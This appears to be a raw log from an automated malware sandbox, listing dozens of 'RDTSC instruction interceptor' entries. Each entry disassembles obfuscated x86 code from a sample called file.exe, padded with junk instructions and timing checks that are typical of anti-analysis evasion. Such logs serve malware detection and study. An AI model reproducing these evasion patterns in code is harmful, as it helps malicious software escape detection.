          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC025D second address: 4EC0294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 18h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F1FDD1C1212h 0x00000014 adc esi, 25D139C8h 0x0000001a jmp 00007F1FDD1C120Bh 0x0000001f popfd 0x00000020 mov bx, cx 0x00000023 popad 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0294 second address: 4EC02CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1445h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F1FDD1C143Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1FDD1C143Dh 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC02CE second address: 4EC02D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC02D2 second address: 4EC02D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC02D8 second address: 4EC02EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1FDD1C1213h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC02EF second address: 4EC02F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC02F3 second address: 4EC0387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a call 00007F1FDD1C120Bh 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 call 00007F1FDD1C120Fh 0x00000017 movzx eax, bx 0x0000001a pop edx 0x0000001b popad 0x0000001c xchg eax, esi 0x0000001d pushad 0x0000001e call 00007F1FDD1C120Eh 0x00000023 pushfd 0x00000024 jmp 00007F1FDD1C1212h 0x00000029 sbb esi, 6D5425A8h 0x0000002f jmp 00007F1FDD1C120Bh 0x00000034 popfd 0x00000035 pop eax 0x00000036 mov dx, 79ECh 0x0000003a popad 0x0000003b push eax 0x0000003c jmp 00007F1FDD1C1212h 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F1FDD1C1217h 0x00000049 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0387 second address: 4EC03EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F1FDD1C143Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movzx esi, di 0x00000016 pushfd 0x00000017 jmp 00007F1FDD1C1449h 0x0000001c add ch, FFFFFFE6h 0x0000001f jmp 00007F1FDD1C1441h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC03EA second address: 4EC03F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC03F1 second address: 4EC0408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1FDD1C143Bh 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0408 second address: 4EC0425 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0425 second address: 4EC0461 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [75AF4538h] 0x0000000e jmp 00007F1FDD1C143Eh 0x00000013 xor dword ptr [ebp-08h], eax 0x00000016 pushad 0x00000017 call 00007F1FDD1C143Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0461 second address: 4EC0486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F1FDD1C1211h 0x0000000a popad 0x0000000b xor eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1FDD1C120Ah 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0486 second address: 4EC048C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC048C second address: 4EC0490 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0490 second address: 4EC04B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1FDD1C1445h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC04B0 second address: 4EC04B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC04B6 second address: 4EC04BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC04BA second address: 4EC04BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC04BE second address: 4EC04F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F1FDD1C143Fh 0x00000010 lea eax, dword ptr [ebp-10h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1FDD1C1445h 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC04F2 second address: 4EC04F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC04F8 second address: 4EC04FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC04FC second address: 4EC0510 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edi, ecx 0x00000013 popad 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0510 second address: 4EC054B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1448h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-18h], esp 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f mov ecx, 75DFBAE9h 0x00000014 popad 0x00000015 mov eax, dword ptr fs:[00000018h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F1FDD1C143Bh 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC054B second address: 4EC05F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 movsx edi, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ecx, dword ptr [eax+00000FDCh] 0x00000012 jmp 00007F1FDD1C120Ah 0x00000017 test ecx, ecx 0x00000019 jmp 00007F1FDD1C1210h 0x0000001e jns 00007F1FDD1C126Ah 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F1FDD1C120Eh 0x0000002b xor si, 0948h 0x00000030 jmp 00007F1FDD1C120Bh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F1FDD1C1218h 0x0000003c xor cx, CBA8h 0x00000041 jmp 00007F1FDD1C120Bh 0x00000046 popfd 0x00000047 popad 0x00000048 add eax, ecx 0x0000004a jmp 00007F1FDD1C1216h 0x0000004f mov ecx, dword ptr [ebp+08h] 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F1FDD1C120Ah 0x0000005b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC05F4 second address: 4EC0603 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0343 second address: 4EB0347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0347 second address: 4EB034D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB034D second address: 4EB0386 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1216h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov al, BCh 0x0000000f movsx ebx, si 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F1FDD1C1211h 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0386 second address: 4EB0396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1FDD1C143Ch 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0396 second address: 4EB041D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 2Ch 0x0000000e pushad 0x0000000f call 00007F1FDD1C1214h 0x00000014 call 00007F1FDD1C1212h 0x00000019 pop eax 0x0000001a pop edi 0x0000001b movzx eax, dx 0x0000001e popad 0x0000001f push esi 0x00000020 jmp 00007F1FDD1C1218h 0x00000025 mov dword ptr [esp], ebx 0x00000028 jmp 00007F1FDD1C1210h 0x0000002d xchg eax, edi 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F1FDD1C1217h 0x00000035 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB041D second address: 4EB0462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c mov ax, 75BFh 0x00000010 mov ebx, ecx 0x00000012 popad 0x00000013 popad 0x00000014 xchg eax, edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1FDD1C1448h 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0462 second address: 4EB0471 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0471 second address: 4EB0477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0477 second address: 4EB047B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB04D2 second address: 4EB04D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB04D6 second address: 4EB04DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB04DC second address: 4EB053F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C143Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b jmp 00007F1FDD1C1440h 0x00000010 je 00007F1FDD1C15F4h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov di, E370h 0x0000001d pushfd 0x0000001e jmp 00007F1FDD1C1449h 0x00000023 xor si, D4F6h 0x00000028 jmp 00007F1FDD1C1441h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB053F second address: 4EB0545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0545 second address: 4EB0549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0615 second address: 4EB061B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB061B second address: 4EB0620 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0686 second address: 4EB06BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 568Ah 0x00000007 mov si, dx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d cmp dword ptr [ebp-14h], edi 0x00000010 jmp 00007F1FDD1C120Dh 0x00000015 jne 00007F204DDAEFFEh 0x0000001b pushad 0x0000001c mov dl, cl 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F1FDD1C120Fh 0x00000025 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB06BD second address: 4EB06CD instructions: 0x00000000 rdtsc 0x00000002 mov bh, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebx, dword ptr [ebp+08h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB06CD second address: 4EB06D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB06D1 second address: 4EB06D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB06D5 second address: 4EB06DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB06DB second address: 4EB0706 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 4C961DD8h 0x00000008 mov edi, 683B3F84h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 lea eax, dword ptr [ebp-2Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1FDD1C1446h 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0706 second address: 4EB0749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov eax, 32AE728Bh 0x00000010 mov ch, ACh 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F1FDD1C120Ah 0x00000019 xchg eax, esi 0x0000001a jmp 00007F1FDD1C1210h 0x0000001f nop 0x00000020 pushad 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 mov ax, 9C99h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b mov edx, ecx 0x0000002d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0749 second address: 4EB0759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 mov cl, bh 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx eax, dx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0759 second address: 4EB082E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1FDD1C1211h 0x00000008 add si, 6996h 0x0000000d jmp 00007F1FDD1C1211h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 nop 0x00000017 pushad 0x00000018 mov dx, cx 0x0000001b pushfd 0x0000001c jmp 00007F1FDD1C1218h 0x00000021 or cl, FFFFFFE8h 0x00000024 jmp 00007F1FDD1C120Bh 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ebx 0x0000002c pushad 0x0000002d push esi 0x0000002e pushfd 0x0000002f jmp 00007F1FDD1C120Bh 0x00000034 sbb ecx, 4F4AE02Eh 0x0000003a jmp 00007F1FDD1C1219h 0x0000003f popfd 0x00000040 pop eax 0x00000041 movsx ebx, si 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 call 00007F1FDD1C1214h 0x0000004e pop esi 0x0000004f pushfd 0x00000050 jmp 00007F1FDD1C120Bh 0x00000055 sub si, 6AEEh 0x0000005a jmp 00007F1FDD1C1219h 0x0000005f popfd 0x00000060 popad 0x00000061 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB082E second address: 4EB084C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov eax, ebx 0x00000011 popad 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB084C second address: 4EB0852 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0852 second address: 4EB0856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0856 second address: 4EB085A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB089B second address: 4EB08A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, bx 0x00000007 popad 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB08A3 second address: 4EB08A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB08A9 second address: 4EB0042 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F1FDD1C1448h 0x00000011 pushfd 0x00000012 jmp 00007F1FDD1C1442h 0x00000017 sbb esi, 6BC48BE8h 0x0000001d jmp 00007F1FDD1C143Bh 0x00000022 popfd 0x00000023 popad 0x00000024 popad 0x00000025 je 00007F204DDAF197h 0x0000002b xor eax, eax 0x0000002d jmp 00007F1FDD19AB6Ah 0x00000032 pop esi 0x00000033 pop edi 0x00000034 pop ebx 0x00000035 leave 0x00000036 retn 0004h 0x00000039 nop 0x0000003a cmp eax, 00000000h 0x0000003d setne cl 0x00000040 xor ebx, ebx 0x00000042 test cl, 00000001h 0x00000045 jne 00007F1FDD1C1437h 0x00000047 jmp 00007F1FDD1C15ABh 0x0000004c call 00007F1FE189A6D5h 0x00000051 mov edi, edi 0x00000053 jmp 00007F1FDD1C143Fh 0x00000058 xchg eax, ebp 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c pushfd 0x0000005d jmp 00007F1FDD1C143Bh 0x00000062 xor cl, 0000005Eh 0x00000065 jmp 00007F1FDD1C1449h 0x0000006a popfd 0x0000006b movzx ecx, dx 0x0000006e popad 0x0000006f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0042 second address: 4EB0048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0048 second address: 4EB011B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F1FDD1C1441h 0x00000010 and al, 00000046h 0x00000013 jmp 00007F1FDD1C1441h 0x00000018 popfd 0x00000019 mov esi, 354A14F7h 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F1FDD1C1448h 0x00000027 xor esi, 0AACBA18h 0x0000002d jmp 00007F1FDD1C143Bh 0x00000032 popfd 0x00000033 mov bh, al 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 pushad 0x00000039 mov al, bh 0x0000003b jmp 00007F1FDD1C143Ah 0x00000040 popad 0x00000041 xchg eax, ecx 0x00000042 jmp 00007F1FDD1C1440h 0x00000047 push eax 0x00000048 jmp 00007F1FDD1C143Bh 0x0000004d xchg eax, ecx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 pushfd 0x00000052 jmp 00007F1FDD1C143Bh 0x00000057 sub cl, FFFFFFEEh 0x0000005a jmp 00007F1FDD1C1449h 0x0000005f popfd 0x00000060 call 00007F1FDD1C1440h 0x00000065 pop eax 0x00000066 popad 0x00000067 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB01A2 second address: 4EB01A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB01A8 second address: 4EB0C36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a and bl, 00000001h 0x0000000d movzx eax, bl 0x00000010 lea esp, dword ptr [ebp-0Ch] 0x00000013 pop esi 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 pop ebp 0x00000017 ret 0x00000018 add esp, 04h 0x0000001b jmp dword ptr [007EA41Ch+ebx*4] 0x00000022 push edi 0x00000023 call 00007F1FDD1E6E37h 0x00000028 push ebp 0x00000029 push ebx 0x0000002a push edi 0x0000002b push esi 0x0000002c sub esp, 000001D0h 0x00000032 mov dword ptr [esp+000001B4h], 007ECB10h 0x0000003d mov dword ptr [esp+000001B0h], 000000D0h 0x00000048 mov dword ptr [esp], 00000000h 0x0000004f mov eax, dword ptr [007E81DCh] 0x00000054 call eax 0x00000056 mov edi, edi 0x00000058 jmp 00007F1FDD1C1440h 0x0000005d xchg eax, ebp 0x0000005e pushad 0x0000005f jmp 00007F1FDD1C143Eh 0x00000064 mov dh, cl 0x00000066 popad 0x00000067 push eax 0x00000068 jmp 00007F1FDD1C143Ch 0x0000006d xchg eax, ebp 0x0000006e jmp 00007F1FDD1C1440h 0x00000073 mov ebp, esp 0x00000075 jmp 00007F1FDD1C1440h 0x0000007a cmp dword ptr [75AF459Ch], 05h 0x00000081 push eax 0x00000082 push edx 0x00000083 jmp 00007F1FDD1C1447h 0x00000088 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0C36 second address: 4EB0C91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F204DD9EFB2h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007F1FDD1C1219h 0x0000001a or esi, 475F96F6h 0x00000020 jmp 00007F1FDD1C1211h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0C91 second address: 4EB0CA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov ax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0CA3 second address: 4EB0CA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0CA7 second address: 4EB0CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0CAD second address: 4EB0CB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0CCF second address: 4EB0D5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1FDD1C1447h 0x00000008 pushfd 0x00000009 jmp 00007F1FDD1C1448h 0x0000000e sbb si, 4C08h 0x00000013 jmp 00007F1FDD1C143Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push 58B99A4Fh 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F1FDD1C1445h 0x00000028 and ecx, 71EFEF26h 0x0000002e jmp 00007F1FDD1C1441h 0x00000033 popfd 0x00000034 mov di, cx 0x00000037 popad 0x00000038 add dword ptr [esp], 1CF501D9h 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
